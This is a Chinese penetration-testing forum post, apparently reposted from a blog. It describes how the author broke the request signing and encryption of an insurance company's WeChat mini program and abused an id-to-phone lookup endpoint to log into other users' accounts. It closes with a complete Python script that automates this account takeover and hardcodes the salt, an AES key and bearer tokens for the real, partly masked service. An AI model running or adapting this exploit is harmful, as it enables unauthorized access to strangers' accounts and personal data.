问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
死磕某小程序
渗透测试
死磕某小程序
死磕某小程序 ====== 前言0x00 ------ 最近无聊挖洞,发现一个小程序防护做的非常严,但是我就要死磕他 开始0x01 ------ 抓包环境 and 小程序逆向(忽略) 看看我的 data:image/s3,"s3://crabby-images/fa712/fa71293ff5d80fb73624c544fb07e319630f42b4" alt="图片.png" 抓个登入包 data:image/s3,"s3://crabby-images/51fce/51fce4527afaa185f344c584ddef4033ed136f39" alt="图片.png" data:image/s3,"s3://crabby-images/8a9de/8a9de2bb938552991da2803717aa603e6c4cf391" alt="图片.png" 加密了,翻翻源码 data:image/s3,"s3://crabby-images/4bfc6/4bfc6c581b58b5b5b376e458a2d757c62e4d8cfe" alt="图片.png" 是Encrypt函数加密的 data:image/s3,"s3://crabby-images/14d52/14d5296d1d0f0fb116959a1286df31f7a8a54a69" alt="图片.png" key是wx.getStorageSync("key");获得的 data:image/s3,"s3://crabby-images/cf049/cf049107b4486d891150797a49423146b42d743f" alt="图片.png" key是g(e)获得的 看一下什么东西调用了getKeys函数 data:image/s3,"s3://crabby-images/19578/19578f38421d96e8305cd8767c982641ceb3093f" alt="图片.png" 是某个请求包的返回包中的参数nonFixedSax和fixedSax data:image/s3,"s3://crabby-images/57ab7/57ab73bff671a0bc893f1bf9b23320ddca77f874" alt="图片.png" 小伙子挺会藏的呀,我怀疑我在打ctf 获得key后走了个g函数 data:image/s3,"s3://crabby-images/c2305/c2305ab905396c9bdd1c2508762d7e50ac64e82e" alt="图片.png" g函数就是个一个加密函数 data:image/s3,"s3://crabby-images/9fa5b/9fa5bf69f9a35926e48836c32ac2d2bc7fe9440c" alt="图片.png" 获得密钥试试 data:image/s3,"s3://crabby-images/d8719/d8719af67967821bb84dcc25fd7be39a12ae7fca" alt="图片.png" 可以解密 然后尝试修改id看看可不可以登入到别人的账号上面 data:image/s3,"s3://crabby-images/10487/10487694ab54e950ee60e2fed93e9b94a2c77759" alt="图片.png" 发现请求过期,应该是sign搞的鬼 他先添加了两个参数saltValue和timestamp当前时间戳 data:image/s3,"s3://crabby-images/809ea/809eae9b51d5eb4afc438bdf265b1b93d7613eae" alt="图片.png" 然后进行了排序首字母大小写排序 类似于这样 data:image/s3,"s3://crabby-images/07a29/07a29906fb773b2a0b2c104330c657f55571893e" alt="图片.png" 然后??? 我见过很多aes加密的js 第一次见到这样加密的,没有密钥貌似只是16进制了一下,然后大写md5一下 data:image/s3,"s3://crabby-images/dbc1a/dbc1afe31f9342bbc71c83da11edb42b3b0fde01" alt="图片.png" 写一下js构造了一个js脚本 data:image/s3,"s3://crabby-images/463d1/463d1886e3751107ad21b1090d8cca4cba7bfd73" alt="图片.png" 然后放到python中,js我实在不熟 使用execjs调用js函数 data:image/s3,"s3://crabby-images/4a3a1/4a3a17c28f3a91878fd3cfeb3b8333b9a46ad9c1" alt="图片.png" 这样sign和timestamp就搞定了 data:image/s3,"s3://crabby-images/7a194/7a19488bccece3f13ee8ce16aa892ebaaeb78303" alt="图片.png" 不行我测试了一会儿发现是验证了userid和手机号的一致性 就需要找到一个userid查询到手机号的接口 我直接爆破 js找到接口 data:image/s3,"s3://crabby-images/8fc7b/8fc7b095f82dbbbb6f443142b5f1d850e5dfa6f8" alt="图片.png" 搞成list,函数就填几个可能的参数比如userid和id什么的 然后python梭哈requests配置一下proxies到burp data:image/s3,"s3://crabby-images/afb25/afb25e6fc59c8ed559550c438302e7d8ae65bef2" alt="图片.png" burp查看结果 找到了一个接口可以通过id来查询到手机号 data:image/s3,"s3://crabby-images/fcef8/fcef8fc56de0cb50f805c4a5f43a618025382d38" alt="图片.png" 接下来有了userid和手机号 手机号aes加密 然后构造脚本 data:image/s3,"s3://crabby-images/9f3be/9f3be1934431808fade632bc8d7156489629d3a3" alt="图片.png" 获得token burp替换token尝试登入 data:image/s3,"s3://crabby-images/90ce7/90ce73f2720b930761276497e05bb4fd439353fa" alt="图片.png" 刷新小程序 data:image/s3,"s3://crabby-images/4df4b/4df4baf6cfa47a78914cef8820fa34178f60fd63" alt="图片.png" 登入成功 开始构造脚本 userid(sigin,timestamp)获得手机号--> 手机号aes加密+userid(sigin,timestamp)获得token burp替换token完成登入 ```php import execjs import requests import json import binascii from Crypto.Cipher import AES import base64 from Crypto.Util.Padding import pad, unpad md5\_js\=""" ...... function AES\_Encrypt(word) { var srcs = CryptoJS.enc.Utf8.parse(word); //console.log(srcs); var aaa=CryptoJS.enc.Hex.stringify(srcs); return aaa.toString(); } {1} function yierjiami(ra) { {1} const jsonStr = ra; {1} const jsonObj = JSON.parse(jsonStr); jsonObj.saltValue = "c3Kx$0i67sds#"; jsonObj.timestamp = Date.now().toString(); //jsonObj.timestamp = "1703606967481" {1} const sortedJsonObj = sortObjectKeys(jsonObj); const sortedJsonStr = JSON.stringify(sortedJsonObj); {1} console.log(sortedJsonStr); var aaa=AES\_Encrypt(sortedJsonStr); {1} return \[r(aaa).toUpperCase(),jsonObj.timestamp\]; {1} } """ def aes\_ecb\_encrypt\_hex(plaintext, key): cipher \= AES.new(key, AES.MODE\_ECB) padded\_plaintext \= pad(plaintext.encode(), AES.block\_size) ciphertext \= cipher.encrypt(padded\_plaintext) return binascii.hexlify(ciphertext).decode() id\=111 content \= '{"id":"%s"}'%(id) ctx \= execjs.compile(md5\_js) sign,time \= ctx.call('yierjiami', content) url \= "https://xxx.xxx.com.cn/Pacificlife/myConsumer/detail" headers \= { "syscode": "TXQMP", "charset": "utf-8", "identify": "e4750356-9f8e-4a63-bdc3-80aca36699b6", "sign": sign, "User-Agent": "Mozilla/5.0 (Linux; Android 10; Pixel XL Build/QP1A.191005.007.A3; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/116.0.0.0 Mobile Safari/537.36 XWEB/1160027 MMWEBSDK/20230805 MMWEBID/2433 MicroMessenger/8.0.42.2460(0x28002A58) WeChat/arm64 Weixin NetType/WIFI Language/zh\_CN ABI/arm64 MiniProgramEnv/android", "content-type": "application/json", "token": "eyJhbGciOiJIUzUxMiJ9.eyJjb25zdW1lcklkIjoxMjEsImNyZWF0ZWQiOjE3MDM2MTg3OTk4MTl9.goZ0iMAXuBhNk6GOwDWmHULU\_oO5HI6bv3YB0DqxJzTGvt5PUzGmo\_AXTkVjUMZRe66WCl8\_ZLCh41UNahis3w", "Accept-Encoding": "gzip, deflate", "timestamp": time } response \= requests.get(url, json.loads(content), headers\=headers,verify\=False) re1\=json.loads(response.text) try: phone\=re1\['data'\]\['secPhone'\] print(phone) if(phone\==None): print("userid没绑定手机号登入失败") exit() except: print("没手机号登入失败") exit() key\_hex \= b'3631475463441074' plaintext\="{}".format(phone) ciphertext \= aes\_ecb\_encrypt\_hex(plaintext, key\_hex) print(ciphertext) content \= '{"id":"%s","phone":"%s","name":"","salesCode":"","password":"","type":"1"}'%(id,ciphertext) ctx \= execjs.compile(md5\_js) sign,time \= ctx.call('yierjiami', content) url \= "https://xxx.xxx.com.cn/Pacificlife/consumer/login" headers \= { "syscode": "TXQMP", "charset": "utf-8", "identify": "e4750356-9f8e-4a63-bdc3-80aca36699b6", "sign": sign, "User-Agent": "Mozilla/5.0 (Linux; Android 10; Pixel XL Build/QP1A.191005.007.A3; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/116.0.0.0 Mobile Safari/537.36 XWEB/1160027 MMWEBSDK/20230805 MMWEBID/2433 MicroMessenger/8.0.42.2460(0x28002A58) WeChat/arm64 Weixin NetType/WIFI Language/zh\_CN ABI/arm64 MiniProgramEnv/android", "content-type": "application/json", "Accept-Encoding": "gzip, deflate", "token": "eyJhbGciOiJIUzUxMiJ9.eyJjb25zdW1lcklkIjoyNDIwMzIyLCJjcmVhdGVkIjoxNzAzNTk4Nzg2MjMzfQ.bnLooesbfQ6ikCJ7WUAuPWFstAD4d\_SZGq-Kijln2\_QPKJC0rrxf7lKzz12nCmxnAX5r3DYbSBP7jO1RwnndaQ", "timestamp": time } #response = requests.get(url, params, headers=headers,proxies=proxies,verify=False) response \= requests.post(url, data\=json.dumps(json.loads(content)), headers\=headers,verify\=False) re2\=json.loads(response.text) print("手机号:{}\\ntoken:{}\\n".format(phone,re2\['data'\]\['token'\])) ``` data:image/s3,"s3://crabby-images/d3279/d3279753f674940a9ff62a7486c8f071c0ffab18" alt="图片.png" 转载于:yier的博客
发表于 2024-05-08 14:13:23
阅读 ( 6471 )
分类:
渗透测试
11 推荐
收藏
4 条评论
捐维藏
2024-07-29 14:02
大佬牛逼
请先
登录
后评论
asddad
2024-08-31 10:37
牛而逼之
请先
登录
后评论
uf9n1x
2024-09-14 17:50
牛牛牛
请先
登录
后评论
miaocat
2024-11-20 14:45
我虽然看不懂,但是我大为震撼
请先
登录
后评论
请先
登录
后评论
xhys
7 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!